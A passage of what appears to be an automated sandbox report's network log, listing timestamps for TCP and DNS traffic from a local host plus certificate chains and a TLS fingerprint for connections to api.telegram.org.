                                                                                                                      Jan 27, 2021 15:42:03.484692097 CET44349768149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:03.485131979 CET44349768149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:03.485177994 CET44349768149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:03.485320091 CET44349768149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:03.661520958 CET44349768149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:03.661562920 CET44349768149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:03.662653923 CET49768443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.666292906 CET49768443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.716264009 CET44349768149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.716409922 CET49768443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.775383949 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.825253010 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.830678940 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.831809998 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.881534100 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.881586075 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.881613016 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.881634951 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.881654024 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.882802963 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.882836103 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.883829117 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.887762070 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.937655926 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.941183090 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:11.990886927 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.992494106 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:12.042208910 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.042237997 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.042247057 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.042290926 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.042444944 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:12.042695045 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:12.087887049 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092099905 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092144012 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092169046 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092185974 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092210054 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092223883 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092247963 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092262030 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092350006 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092375040 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092459917 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.092720032 CET49769443192.168.2.7149.154.167.220
                                                                                                                      Jan 27, 2021 15:42:12.144110918 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144145966 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144160986 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144175053 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144188881 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144202948 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144227028 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144247055 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144268990 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144283056 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144295931 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.144309998 CET44349769149.154.167.220192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:12.340478897 CET44349769149.154.167.220192.168.2.7

UDP Packets

Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                      Jan 27, 2021 15:39:45.917840004 CET53549118.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:46.875595093 CET4995853192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:46.923955917 CET53499588.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:47.852305889 CET5086053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:47.900228024 CET53508608.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:49.135725021 CET5045253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:49.186652899 CET53504528.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:50.156994104 CET5973053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:50.221220016 CET53597308.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:51.147923946 CET5931053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:51.207005978 CET53593108.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:39:54.711616993 CET5191953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:39:54.772500038 CET53519198.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:04.847881079 CET6429653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:04.898616076 CET53642968.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:22.687508106 CET5668053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:22.736802101 CET53566808.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:22.843063116 CET5882053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:22.893771887 CET53588208.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:23.025090933 CET6098353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:23.072978020 CET53609838.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:26.948806047 CET4924753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:27.724040985 CET5228653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:28.005475998 CET4924753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:28.658900976 CET53492478.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:28.659524918 CET53492478.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:28.690206051 CET53522868.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:29.574579000 CET5606453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:29.636046886 CET53560648.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:30.392115116 CET6374453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:30.474877119 CET53637448.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:31.338669062 CET6145753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:31.390422106 CET53614578.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:32.106720924 CET5836753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:32.163254023 CET53583678.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:32.832277060 CET6059953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:32.891266108 CET53605998.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:33.527162075 CET5957153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:33.584872007 CET53595718.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:33.710160971 CET5268953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:33.773241043 CET53526898.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:34.985593081 CET5029053192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:35.044379950 CET53502908.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:36.149755001 CET6042753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:36.205991030 CET53604278.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:36.624577045 CET5620953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:36.675945044 CET53562098.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.106697083 CET5958253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:37.165129900 CET53595828.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:37.999283075 CET6094953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:38.055941105 CET53609498.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:38.533976078 CET5854253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:38.596560955 CET53585428.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:42.044061899 CET5917953192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:42.094304085 CET53591798.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:47.259381056 CET6092753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:47.310029984 CET53609278.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:52.646893978 CET5785453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:52.697794914 CET53578548.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:40:58.084070921 CET6202653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:40:58.134624004 CET53620268.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:03.597238064 CET5945353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:03.645111084 CET53594538.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:09.098335028 CET6246853192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:09.146516085 CET53624688.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:09.195938110 CET5256353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:09.243799925 CET53525638.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:10.637166023 CET5472153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:10.693717957 CET53547218.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:14.693689108 CET6282653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:14.746314049 CET53628268.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:20.273941994 CET6204653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:20.332885981 CET53620468.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:30.856502056 CET5122353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:30.914367914 CET53512238.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:31.014096022 CET6390853192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:31.070439100 CET53639088.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:35.566085100 CET4922653192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:35.624517918 CET53492268.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:40.251019001 CET6021253192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:40.301875114 CET53602128.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:44.977015972 CET5886753192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:45.026854038 CET53588678.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:41:55.161653042 CET5086453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:56.198138952 CET5086453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:41:56.248830080 CET53508648.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:03.052429914 CET6150453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:03.101008892 CET53615048.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:11.725560904 CET6023153192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:11.773346901 CET53602318.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:20.497102022 CET5009553192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:20.547625065 CET53500958.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:29.290561914 CET5965453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:30.305404902 CET5965453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:31.301431894 CET5965453192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:31.349600077 CET53596548.8.8.8192.168.2.7
                                                                                                                      Jan 27, 2021 15:42:37.549274921 CET5823353192.168.2.78.8.8.8
                                                                                                                      Jan 27, 2021 15:42:37.599611998 CET53582338.8.8.8192.168.2.7

                                                                                                                      DNS Queries


                                                                                                                      DNS Answers


HTTPS Packets

                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:45.141561031 CET149.154.167.220443192.168.2.749766CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:41:56.357264996 CET149.154.167.220443192.168.2.749767CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:03.210078001 CET149.154.167.220443192.168.2.749768CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:11.882802963 CET149.154.167.220443192.168.2.749769CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:20.660326004 CET149.154.167.220443192.168.2.749770CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                                                      Jan 27, 2021 15:42:31.467353106 CET149.154.167.220443192.168.2.749771CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
